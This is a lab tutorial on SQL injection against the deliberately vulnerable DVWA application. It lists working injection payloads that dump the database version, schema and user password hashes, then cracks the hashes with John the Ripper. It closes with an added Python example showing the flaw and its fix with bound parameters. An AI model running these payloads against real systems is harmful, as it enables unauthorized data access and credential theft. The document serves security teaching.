
SQL Injection Lab Part 1 – Lab Setup


By: bjacharya

September 6, 2016

Hello Cybrarians!!!

Welcome to: SQL injection lab PT.1 – Intro/Lab setup

In this lab, we'll begin the SQL injection series. This will be a multi-part article/guide to learning SQL injection.

*Skill/Experience: Before proceeding with this series, you must know the basics of setting up VM environments.


  • Let's start with the lab setup (this part explains how we will perform this lab and what we will deal with).
      • Kali Linux (or BT 5r3) VM and Metasploitable VM in NAT mode. (You must know this.)
      • Check the IP address of both devices.

Step-by-step instructions
  1. Open Kali Linux (or BT 5r3).
  2. Open your browser and type https://IP address of Metasploitable/dvwa/login.php
  3. Log in with user name "admin" and password "password".
  4. Click on DVWA Security, set it to low, then submit.
  5. Click on manual SQL injection.
  6. In the User ID box, type 1 and Submit (PHP select statement: $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";)
  7. Type: %' or '0'='0 (mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';)
  8. Get DB version: %' or 0=0 union select null, version()#
  9. Get DB user: %' or 0=0 union select null, user()#
  10. Get DB name: %' or 0=0 union select null, database()#
  11. Get schema information: %' and 1=0 union select null, table_name from information_schema.tables#
  12. Get the user table in the schema information: %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
  13. Get all the column fields in the information_schema user table: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users'#
  14. Let's get the password authentication hash: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users#
  15. Now copy all the hashes into a notepad in the format below, e.g. user:password
  16. Save it to /pentest/passwords/john with the name dvwa_password.txt
  17. Open a console and go to /pentest/passwords/john
  18. cd /pentest/passwords/john
  19. Now launch John the Ripper: ./john --format=raw-MD5 dvwa_password.txt and hit Enter.
(You will get the passwords)
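
Why the input from step 7 returns every row when it is pasted into the statement from step 6, and how a bound parameter stops it, shown as an added example that is not part of the original article or DVWA's own code. It assumes Python's sqlite3 with a constructed users table standing in for the lab's MySQL database; all function names are hypothetical.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the lab's users table (sample rows only)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT, first_name TEXT, last_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("1", "admin", "admin"),
                    ("2", "Gordon", "Brown"),
                    ("3", "Hack", "Me")])
    return db

def lookup_concat(db, user_id):
    """Same shape as the PHP statement in step 6: input becomes SQL text."""
    sql = ("SELECT first_name, last_name FROM users "
           "WHERE user_id = '" + user_id + "'")
    return db.execute(sql).fetchall()

def lookup_bound(db, user_id):
    """Hardened form: the input is bound as a value and is never parsed as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()

def lookup_validated(db, user_id):
    """Defence in depth: reject anything that is not a plain ASCII number."""
    if not (user_id.isascii() and user_id.isdigit()):
        raise ValueError("user_id must be numeric")
    return lookup_bound(db, user_id)

STEP7_INPUT = "%' or '0'='0"   # the input shown in step 7 of the article

if __name__ == "__main__":
    db = make_db()
    # Concatenated: the quote in the input closes the string literal, so the
    # WHERE clause becomes user_id = '%' or '0'='0', which is true for every row.
    print("concat, id 1:     ", lookup_concat(db, "1"))
    print("concat, step 7:   ", lookup_concat(db, STEP7_INPUT))
    # Bound: the whole input is compared as one literal value, so nothing matches.
    print("bound, step 7:    ", lookup_bound(db, STEP7_INPUT))
    try:
        lookup_validated(db, STEP7_INPUT)
    except ValueError as exc:
        print("validated, step 7:", exc)
```

The same two controls apply in PHP through prepared statements (PDO or mysqli) and a numeric check on the id before the query runs.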

...OK Cybrarians, we'll continue this in the next part.

By: Bijay Acharya
